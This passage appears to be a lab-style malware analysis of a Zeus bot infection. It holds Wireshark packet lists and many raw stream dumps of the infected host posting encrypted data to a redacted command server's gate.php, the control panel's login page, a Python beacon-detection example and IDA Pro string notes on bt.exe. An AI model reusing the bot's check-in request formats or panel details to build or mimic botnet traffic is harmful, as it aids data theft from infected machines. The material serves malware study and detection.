308 7.584476 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
332 7.889639 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
333 7.892491 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0
334 7.893379 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
358 8.168568 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
359 8.169845 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
374 8.620548 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
376 8.623252 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
377 8.624013 192.168.1.109 xx.xxx.xxx.xx TCP rfx-lm > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0

Next I filtered using Statistics -> Conversations to narrow the information to host-to-web-server traffic. That view gives a basic summary of ports and how many packets went from the host to the web server. It also shows that the host used 3709 distinct source ports while sending information back to the web server.

From Statistics -> Flow Graph we see that "gate.php" and "cp.php" are the primary resources the host was requesting from the web server.

Wireshark shows no other evident information about the type of files the infected host is sending to the web server. Many packets from the server to the infected host carry XML; as the stream dumps below show, this is the XHTML login page returned by "cp.php?m=login". The port names in the Flow Graph output (itm-lm, silkp1, silkp2, silkp3, silkp4, glishd, and the ica, cvc, liberty-lm and rfx-lm names in the packet list above) are not services being probed in order: Wireshark resolves port numbers to IANA service names, and what the names reflect is the client's ephemeral source port advancing by one for each new TCP connection to the server (1494 ica, 1495 cvc, 1496 liberty-lm, 1497 rfx-lm), which is also why the Conversations view counts thousands of ports. Most payloads appear to have been encrypted before transfer, as the following sample TCP stream outputs show. Each dump is labelled with Wireshark's service name for the client's source port on that stream.

dellpwrappks:

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆðqua;Poï’ì:.R«"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqH²ſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´ç7n%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:27:03 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=30

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 343

Connection: Keep-Alive

Pragma: no-cache

€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™•�%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾f

A¨ïÛéf�«åÝrŖc…¬¡XøDûì­kL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>

¢¹


Ü.| dŒÛ ̀ ÍáŕÑb¼

’%µR‰ÜÚ­Ö^VTSZ=ÍÀ/ob

ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:27:08 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Connection: close

Content-Type: text/html

dx-instrument:

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð_S±¡®

ýÅ<?¦ºüñ;ñ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÓàqH§µ*Ϩýð"ðÇN_ý@k1

ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´…e%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ

½¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:32:52 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=30

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð:»qyk¶ÿ… žÍh•,]"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqH§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´®e%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­ãC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:32:58 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=29


Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð²þ|ÎÈÑ·÷ŸüxõäL="³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÓàqH

§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´'µe%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ïÛéf�«åÝrŖc

…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­ðE7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:33:04 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=28

Connection: Keep-Alive

Content-Type: text/html

post ucf gate pkt-krb-ipsec:

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð«lRò1©®ãGt•ÿy|÷"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHɧµ*Ϩýð"ðÇN_ý@k1 ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´-

]k%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1

vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­-B7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200

OK

Date: Mon, 25 Apr 2011 11:29:54 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=30

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*


User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 343

Connection: Keep-Alive

Pragma: no-cache

€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1

ñB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1

vf¾fA¨ïÛéf�«åÝrŖc…¬¡XøDûì­kL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ

²©ŗ»žlDø>ÿ¹

Ü.| dŒÛ ̀ ÍáŕÑb¼

’%µR‰ÜÚ­Ö^VTSZ=ÍÀ/ob

ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:29:57 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=29

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆðZg‡Àî^l

ìê7•Ð•"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl ¿̧î.: ÔŔ

¸eqcê<·1ÑàqHçµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´)ck%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA

¨ïÛéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­˜D7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:00 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=28

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache


(~ÿÊ5žuÆðˆ’RÐQoL{ „ q1Q"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHú§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­ûG7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:07 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=27

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð¯!´6ˆèŒeÁr¸ÇÒä"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHý§µ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´/k%eqÿTþspŗ‹{ív/éQTÆÀI•Ž™®1vf¾fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­IC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:30:14 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Connection: close

Content-Type: text/html

dellwebadmin-2:

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 343

Connection: Keep-Alive

Pragma: no-cache

€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f

A¨ïÛéf�«åÝrŖc…¬¡XøDûì­kL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>

¢¹

Ü.| dŒÛ ̀ ÍáŕÑb¼

’%µR‰ÜÚ­Ö^VTSZ=ÍÀ/ob


ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:30 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=30

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆðJmI¸Ò\®

¤R?pB·zÉ"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !� ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ

¸eqcê<·1ÓàqH-ſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´d’i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­'C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:35 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=29

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 343

Connection: Keep-Alive

Pragma: no-cache

€~ÿÊ5žtÆð›Ø:‹ŗ´Ñ,ÑJè.ôX"³ÃÒ´^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHjÿ‹*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´™��%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶f

A¨ïÛéf�«åÝrŖc…¬¡XøDûì­kL'Û)®iÍ´€(¤%xæ#‹çð¿}å4V=ð¬ÃŗB¸}ÝŽðý$E%hG›I•ìý¡Ñ

kK’ƒœå¶f÷f�ã&�ý´?�œíV¤ÉŔ²©ŗ»žlDø>

¢¹

Ü.| dŒÛ ̀ ÍáŕÑb¼

’%µR‰ÜÚ­Ö^VTSZ=ÍÀ/ob

ŗܸë;ƒO„kÜ¥HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:35 GMT

Server: Apache

X-Powered-By: PHP/5.2.17


Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=28

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð-jé•×9ÁY Á)íü0T"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÔŔ

¸eqcê<·1ÑàqHſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´À»i%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­aC7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:41 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=10, max=27

Connection: Keep-Alive

Content-Type: text/html

POST /ucf/gate.php HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Content-Length: 255

Connection: Keep-Alive

Pragma: no-cache

(~ÿÊ5žuÆð浪&>ˆ~}pÖëp"³ÃÔ½^ü!ê Zˆ·±ŗ‰Q¶ſ !•

ËJùßÐÛò€Nü$›ÁŸ¶j„Šl¸¿î.: ÒŔ

¸eqcê<·1ÑàqHſµ*Ϩýð"ðÇN_ý@k1ðB:U-@NÈØ2oACøÿ«ë¬ÒŽð´aCh%eqÿTþspŗ‹{ív/éQTÆÀI�Ž™®1vf¶fA¨ï

Ûéf�«åÝrŖc…¬¡XøDûì­kF'Û)®iÍ´¤(¤%\æ#‹ÁËã*¹]rſÿ@þé1д>µ­3C7sZ,~4µ,ìˆÞýÑkK‡ƒHTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:28:47 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Vary: Accept-Encoding

Content-Length: 0

Connection: close

Content-Type: text/html

get:

GET /ucf/cp.php?m=login HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Pragma: no-cache


HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:29:53 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0

Pragma: no-cache

Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf

Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf

Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:29:52 GMT; path=/ucf

Vary: Accept-Encoding

Connection: close

Content-Type: application/xhtml+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title>login</title>

<meta http-equiv="Content-Style-Type" content="text/css" />

<meta http-equiv="Content-Script-Type" content="text/javascript" />

<link rel="stylesheet" href="theme/style.css" type="text/css" />

</head>

<body>

<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"

style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"

valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input

type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td

align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"

style="width:200px" /></td></tr><tr><td>&#160;</td><td align="left" colspan="1"><input

type="checkbox" name="remember" value="1" />&#160;Remember (MD5

cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"

value="Submit" /></td></tr></table></form>

</body>

</html>

sftsrv:

GET /ucf/cp.php?m=login HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Host: xxx.com

Pragma: no-cache

HTTP/1.1 200 OK

Date: Mon, 25 Apr 2011 11:31:14 GMT

Server: Apache

X-Powered-By: PHP/5.2.17

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, max-age=0, pre-check=0, post-check=0

Pragma: no-cache

Set-Cookie: ref=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf

Set-Cookie: p=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf


Set-Cookie: u=deleted; expires=Sun, 25-Apr-2010 11:31:13 GMT; path=/ucf

Vary: Accept-Encoding

Connection: close

Content-Type: application/xhtml+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title>login</title>

<meta http-equiv="Content-Style-Type" content="text/css" />

<meta http-equiv="Content-Script-Type" content="text/javascript" />

<link rel="stylesheet" href="theme/style.css" type="text/css" />

</head>

<body>

<form method="post" id="login" action="cp.php?m=login"><table class="tbl1"

style="width:auto"><tr><td colspan="2" class="td_hdr" align="left">Login</td></tr><tr><td colspan="1"

valign="top"><table class="tbl1" width="100%"><tr><td align="left">User name:</td><td><input

type="text" name="user" value="" maxlength="255" style="width:200px" /></td></tr><tr><td

align="left">Password:</td><td><input type="password" name="pass" value="" maxlength="255"

style="width:200px" /></td></tr><tr><td>&#160;</td><td align="left" colspan="1"><input

type="checkbox" name="remember" value="1" />&#160;Remember (MD5

cookies)</td></tr></table></td></tr><tr><td colspan="2" align="right"><input type="submit"

value="Submit" /></td></tr></table></form>

</body>

</html>

From Wireshark we learned that there is a client-server relationship between the infected host and the web server, with many source ports used to communicate back and forth. No clear text was found in the POST bodies to show what the host is asking for or giving to the web server; the only readable content is the XHTML login page the server returns for "cp.php". The main resources are "gate.php", the bot gateway that receives the encrypted POSTs and answers each with an empty 200 response, and "cp.php", the control panel.
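The stream dumps above have a recognisable shape: the same client POSTs to one URL every few seconds, the body is opaque rather than form data, no Content-Type is sent, and every reply is a 200 with Content-Length 0. The following is an added example (not part of the paper) of turning that shape into a detection over request/response records of the kind Follow TCP Stream exports. The records are constructed here to match the captured gate.php headers and response timestamps; the bodies are placeholder bytes, not the captured ciphertext, and the control-panel login records and the 192.168.1.5 operator address are assumed for contrast.

```python
"""Added example: flag bot check-in traffic of the kind seen in the capture above.

Heuristic, run over request/response records (e.g. exported from Wireshark's
Follow TCP Stream): repeated POSTs from one client to one URL, a few seconds
apart, with bodies that are not readable text, no Content-Type, and empty 200
replies. Sample records are constructed to match the captured gate.php headers;
the bodies are placeholders, not the captured ciphertext.
"""
import statistics
from collections import defaultdict
from datetime import datetime


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def printable_ratio(body):
    """Share of bytes that are printable ASCII; form data is ~1.0, ciphertext ~0.37."""
    if not body:
        return 1.0
    return sum(0x20 <= b < 0x7F for b in body) / len(body)


def opaque_body(n):
    """Constructed stand-in for an encrypted body: an affine walk through all
    256 byte values, so its printable ratio is fixed near 95/256."""
    return bytes((i * 37 + 11) & 0xFF for i in range(n))


def gate_post(n):
    """Request carrying the exact header set the captured gate.php POSTs have."""
    head = (b"POST /ucf/gate.php HTTP/1.1\r\nAccept: */*\r\n"
            b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"
            b"Host: xxx.com\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n"
            b"Pragma: no-cache\r\n\r\n" % n)
    return head + opaque_body(n)


def login_post(form):
    """Constructed control: an operator submitting the panel login form."""
    head = (b"POST /ucf/cp.php?m=login HTTP/1.1\r\nHost: xxx.com\r\n"
            b"User-Agent: Mozilla/5.0\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\n\r\n" % len(form))
    return head + form


# (time, client, raw request, response status, response body length).
# Times follow the Date headers of the captured responses; the rest is assumed.
SAMPLE = [
    ("11:28:30", "192.168.1.109", gate_post(343), 200, 0),
    ("11:28:35", "192.168.1.109", gate_post(255), 200, 0),
    ("11:28:41", "192.168.1.109", gate_post(255), 200, 0),
    ("11:28:47", "192.168.1.109", gate_post(255), 200, 0),
    ("11:29:53", "192.168.1.5", login_post(b"user=ucf&pass=wrong1&remember=0"), 200, 1773),
    ("11:31:14", "192.168.1.5", login_post(b"user=ucf&pass=wrong2&remember=0"), 200, 1773),
    ("11:33:00", "192.168.1.5", login_post(b"user=ucf&pass=secret&remember=1"), 302, 0),
]


def detect_beacons(records, min_hits=3, max_median_gap=60.0, max_printable=0.6):
    """Group POSTs by (client, path) and score each group as a check-in channel."""
    groups = defaultdict(list)
    for ts, client, raw, status, resp_len in records:
        method, path, headers, body = parse_request(raw)
        if method != "POST":
            continue
        when = datetime.strptime(ts, "%H:%M:%S")
        groups[(client, path)].append((when, headers, body, status, resp_len))

    findings = {}
    for key, hits in groups.items():
        if len(hits) < min_hits:
            continue
        hits.sort(key=lambda h: h[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        ratio = statistics.mean(printable_ratio(h[2]) for h in hits)
        empty_200 = all(h[3] == 200 and h[4] == 0 for h in hits)
        untyped = all("content-type" not in h[1] for h in hits)
        findings[key] = {
            "count": len(hits),
            "median_gap_s": statistics.median(gaps),
            "printable_ratio": round(ratio, 2),
            "beacon": (statistics.median(gaps) <= max_median_gap
                       and ratio <= max_printable and empty_200 and untyped),
        }
    return findings


if __name__ == "__main__":
    for (client, path), info in detect_beacons(SAMPLE).items():
        print(client, path, info)
```

The four conditions are deliberately independent of the URL name: a panel renamed away from gate.php still produces short-interval, untyped, unreadable POSTs answered by empty 200s, while an operator's login form fails on every one of them.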

IDA Pro 5

All the code that makes this Zeus run relies on the "zse.exe" and "bt.exe" executables. We can look at what is happening at the machine level and inspect the strings and comments in the code for hints about what the program is supposed to do.

Both executables were analyzed with IDA Pro 5 to find the inputs, outputs, text comments, the compiler used to build the program and all the dependencies in the code. The flow diagram for the "zse.exe" executable is very complex and would take more than six months to trace through. The "bt.exe" flow diagram is more manageable but would also take an exhaustive amount of time to conquer. For this experiment the focus was just to find the variables and functions and make educated assumptions based on those findings.

bt.exe

The compiler used to build the program is vc6win (Visual C++ 6).

F (dark blue) - regular function:
start 0040D70F

A (dark green) - ASCII string:
aNpnitp2s_42Ucn 004010A0
a5hg5AD_fnvf9 00401A8C
aYx5RYaQlgy 00401B28
aFF2ms4dYIO 00401C1C
aQXLAd?fnXdqvdA 00401C44
aHaM_ 00401C63
aGn4v89Tnpcq9ki 00402C0C
aUhxp 0040360C
aEglEs?AkvucpLa 004037B1
aCV_bKv2a8p? 00403880
aHrnH8vD3GIuCdx 00403B30
aGsiNabQR6xE8yv 00403B78
a5cs8LFo3nymhn_ 00403BA1
a?fx9a65HEb 0040445C

I (purple) - imported name:

The import table below mixes security-descriptor, registry, service-control, event-log and CryptoAPI functions (advapi32) with window, menu, DDE and OLE functions (user32, ole32) and path/URL helpers (shlwapi), many of which a headless bot has no evident use for. A static import list like this should be read as the set of APIs the binary can reach, not as proof of what it calls; padded import tables and run-time resolution through GetProcAddress are common in this class of malware, so the real API usage has to be confirmed from the disassembly.

